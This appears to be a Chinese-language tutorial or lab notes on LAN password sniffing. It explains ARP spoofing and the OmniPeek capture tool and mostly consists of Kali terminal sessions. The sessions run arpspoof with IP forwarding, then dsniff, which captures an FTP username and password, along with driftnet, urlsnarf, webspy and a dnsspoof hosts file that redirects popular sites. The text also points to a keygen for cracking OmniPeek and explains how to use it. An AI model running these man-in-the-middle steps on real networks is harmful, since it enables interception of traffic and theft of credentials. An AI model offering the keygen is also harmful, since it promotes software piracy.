密码嗅探 二、三层地址 - IP网络到网络 - MAC主机到主机 交换机与HUB - HUB全端口转发 - 交换机根据学习地址转发 - 混杂模式抓包 |
【课外拓展】局域网密码嗅探器,只需在自己的电脑上运行便可获取局域网中任意一台电脑的账号密码,支持交换机环境下的局域网目前支持嗅探POP3、FTP、SMTP、NNTP、IMAP、TELNET、HTTP、IRC协议中的密码,软件在线升级,同时还提供众多局域网管理工具软件
密码嗅探 Arp协议 - 免费ARP - 基于广播学习 - 以太网、ARP头 - 基于、响应相对独立 - 基于传闻的协议 |
【课外拓展】地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。地址解析协议是建立在网络中各个主机互相信任的基础上的,网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存;由此攻击者就可以向某一主机发送伪ARP应答报文,使其发送的信息无法到达预期的主机或到达错误的主机,这就构成了一个ARP欺骗。ARP命令可用于查询本机ARP缓存中IP地址和MAC地址的对应关系、添加或删除静态对应关系等。相关协议有RARP、代理ARP。NDP用于在IPv6中代替地址解析协议。
Omnipeek
Omnipeek 是出自WildPackets的著名的抓包软件。
概述
编辑
其功能与Sniffer Pro有相似之处,但是经过多年的发展,其开发环境已经从VC++转移到了C#平台。
注;WildPackets是一家全球知名的软件公司,公司成立的目标在于针对复杂的网络环境,提供维护、除错及最佳化等工作的方案。而其开发的产品能够提供各个阶段的IT人员很容易就各种异质网络及网络通讯协定,执行管理、监控、分析、除错及最佳化的工作。
关于公司
自 1990 起,,Wildpackets就已经成功推出故障分析方案 (Fault analysis solutions),为全球各大型企业提供了既可靠又具稳定性的网络系统。由桌面计算机到数据中心 (Data Center),从无线局域网(Wireless LAN) 到千兆骨干网络(Gigabit backbones),无论是企业的内部网络或者是分布式网络的互连,Wildpackets 都能够为企业快速发现和处理影响网络的问题。全球超过5000名的客户正在使用 Wildpackets 的产品,协助他们解决网络系统的问题,从而提高网络系统的性能,这些客户涵盖了财富1000强公司中的80%。
关于Omni
Omni平台实现了从单一控制台进行全网范围的分析与故障诊断,包括广域网、无线网络。结合Omni DNX分布式引擎、专家分析系统,使用Omni的OmniPeek控制台能够并发、独立监控分析多个网段,管理员可以快速恢复业务系统,最大化网络可用时间。Omni平台非常容易进行部署、管理、扩展,是企业值得拥有的网络分析与故障诊断的解决方案。
基本介绍
OmniPeek 提供统一分析除错网络之管理介面,OmniPeek 让网络之管理者能透过统一之介面同时分析多个网段之网络状况,更进而分析底层之网络状况,以快速辨识问题的功能。基于WildPackets屡获殊荣的EtherPeek NX技术,Omni3 包含了OmniPeek控制台、分布式Peek DNX引擎。这些组件无缝的结合工作可以透视复杂的分布式网络。 OmniPeek OmniPeek将WildPackets的EtherPeek NX产品的本地分析能力扩展到远程网段。OmniPeek拥有EtherPeek NX所有受欢迎的特点功能,包括: · 基于信息包流的专家分析系统和应用分析 ·交互式节点图 · 完整的七层协议解码 · 应用响应时间(ART)分析 · 安全功能 · 监控与报表 · RMON分布式分析
OmniPeek同样有能力连接到远程运行多种应用的引擎。运行在Omni3 引擎上的首要应用是Peek DNX(Distributed Network eXpert分布式网络专家)。为了显示远程网段信息,OmniPeek从Peek DNX收集统计数据并进行相关分析。OmniPeek控制台的界面与操作方式都与EtherPeek NX相同:非常易于使用,诸如"选择相关数据包”等内嵌功能以及可客户化的界面。OmniPeek也用来配置远程引擎,包括过滤、报告、和专家系统等设置。只有在用户需要解码、分析或者本地保存数据包内容时,数据包文件才会被传送到OmniPeek。
选择一个好用的抓包软件很重要,OmniPeek不但具有信息包流的专家分析系统和应用分析,完整的七层协议解码,应用响应时间(ART)分析以及互式节点图等功能,同时还可以为您提供安全功能,与监控功能。有了OmniPeek,您就可以更好的进行抓包工作了。
omnipeek 7.9.1是出自WildPackets的著名的抓包软件。其功能与Sniffer Pro有相似之处,但是经过多年的发展,其开发环境已经从VC++转移到了C#平台。
OmniPeek拥有EtherPeek NX所有受欢迎的特点功能,包括基于信息包流的专家分析系统和应用分析,交互式节点图,完整的七层协议解码,应用响应时间(ART)分析,安全功能,监控与报表,RMON分布式分析!
monipeek注册机,已经测试过有的5.0、6.0、6.1、6.5、7.5的版本都可以注册,会被认为是病毒,这个不解释。
使用方法:
1、在Product的下拉框中选中OmniEngine Enterprise
2、Product Version中选择对应的版本,比如你是6.5的版本就输入65 是7.5的版本就输入75即可。
3、看上以上说明仍不会用的建议回炉重造
官方介绍:
OmniPeek 提供统一分析除错网络之管理介面,OmniPeek 让网络之管理者能透过统一之介面同时分析多个网段之网络状况,更进而分析底层之网络状况,以快速辨识问题的功能。基于WildPackets屡获殊荣的EtherPeek NX技术,Omni3 包含了OmniPeek控制台、分布式Peek DNX引擎。这些组件无缝的结合工作可以透视复杂的分布式网络。 OmniPeek OmniPeek将WildPackets的EtherPeek NX产品的本地分析能力扩展到远程网段。
OmniPeek同样有能力连接到远程运行多种应用的引擎。运行在Omni3 引擎上的首要应用是Peek DNX(Distributed Network eXpert分布式网络专家)。为了显示远程网段信息,OmniPeek从Peek DNX收集统计数据并进行相关分析。OmniPeek控制台的界面与操作方式都与EtherPeek NX相同:非常易于使用,诸如"选择相关数据包”等内嵌功能以及可客户化的界面。OmniPeek也用来配置远程引擎,包括过滤、报告、和专家系统等设置。只有在用户需要解码、分析或者本地保存数据包内容时,数据包文件才会被传送到OmniPeek。
OmniPeek拥有EtherPeek NX所有受欢迎的特点功能:
· 基于信息包流的专家分析系统和应用分析
·交互式节点图 · 完整的七层协议解码
· 应用响应时间(ART)分析
· 安全功能
· 监控与报表
· RMON分布式分析!
NEW Capture----->Adntere----->local machine: RENBOX(本地连接)----->确定
Start Capture
C:\User\w7>arp -d
C:\User\w7>ping 192.168.1.1
Send----->Set Send Packet //编辑内容
C:\User\w7>192.168.1.110
C:\User\w7>arp -a
接口:192.168.1.115 --- 0xb
Internet 地址 物理地址 类型
192.168.1.1 14-75-90-21-4f-56 动态
192.168.1.110 38-00-27-db-h2-af 动态
224.0.0.2 01-00-5e-00-00-16 静态
root@k:~# arp -an
? (192.168.1.115) at 08:00:27:19:91:2e [ether] on eth0
? (192.168.1.1) at 08:00:27:19:91:2e [ether] on eth0
root@k:~# ping 192.168.1.1
PING 192.168.1.1 {192.168.1.1) 56(64) bytes of data.
^C
... 192.168.1.1 ping statistics ...
3 packets transmitted, 0 received, 100% packet loss, time 2010ms
root@k:~# arp -d 192.168.1.1
密码嗅探 手动修改数据包实现ARP欺骗 arpspoof - echo 1 > /proc/sys/net/ipv4/ip_forward - arpspoof -t 1.1.1.12 -r 1.1.1.1 网络嗅探 - dirftnet -i eth0 -a -d tempdir -s - dnsspoof -i eth0 -f /usr/share/dnsiff/dnsspoof.hosts - urlsnarf -i eth0 - webspy -i eth0 1.1.1.10 - dnsiff -i eth0 -m /usr/share/dsniff/dsniff.services |
root@k:~# arp -t 192.168.1.115 -r 192.168.1.11 //实现双向欺骗
root@k:~# cat /proc/sys/net/ipv4/ip_forword
0
root@k:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@k:~# cat /proc/sys/net/ipv4/ip_forword
1
ip.addr eq 192.168.1.115
root@k:~# dirftnet -i eth0
root@k:~# dirftnet -i eth0 -a -d /tmp -s
root@k:~# webspy -i eth0
Version: 2.4
Usage: webspy [-i interface | -p pcapfile] host
root@k:~# webspy -i eth0 192.168.1.115
websyp: not running on display :1
openURL(http://58.63.137.200/(
webspy: not running on display :1
root@k:~# openvas-stop
Stopping OpenVas Services
root@k:~# urlsnarf -i eth0
root@k:~# dsniff -h
Version: 2.4
Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen]
[-f services] [-t trigger[,...]] [-r|-w savefile]
[expression]
root@k:~# dnsiff -i eth0 -m
dsniff: listening on eth0
--------------------
04/25/16 12:32:27 tcp 192.168.1.115.49889 -> 106.251.6.6.21 (ftp)
USER ftpuser1
PASS ftppassweord123
C:\user\w7>ftp
ftp> o 106.251.6.6
连接到106.251.6.6
220 FTP Server 1.2.4
用户<106.251.6.6:
331 Password required for ftpuserl
密码:
530 Login incorrect.
登录失败
ftp>quit
221 Goodbye.
root@k:~# vi /usr/share/dnsiff/dnsspoof.hosts
192.168.1.1 *.taobao.com
192.168.1.1 *.google.com
192.168.1.1 *.youtbe.com
root@k:~# dnsspoof -i eth0 -f /usr/share/dnsiff/dnsspoof.hosts
dnsspoof: listening on eth0 [udp dst port 53 and not src 192.168.1.110]
192.168.1.115.63606 > 124.207.160.106.53: 24110+ A? www.taobao.com
192.168.1.115.63606 > 124.207.160.106.53: 24110+ A? www.taobao.com
192.168.1.115.63606 > 124.207.160.106.53: 3976+ A? www.google.com
192.168.1.115.63606 > 124.207.160.106.53: 3976+ A? www.google.com
192.168.1.115.63606 > 124.207.160.106.53: 22049+ A? www.youtube.com
192.168.1.115.63606 > 124.207.160.106.53: 22049+ A? www.youtube.com
root@k:~# netstat -panut | grep 53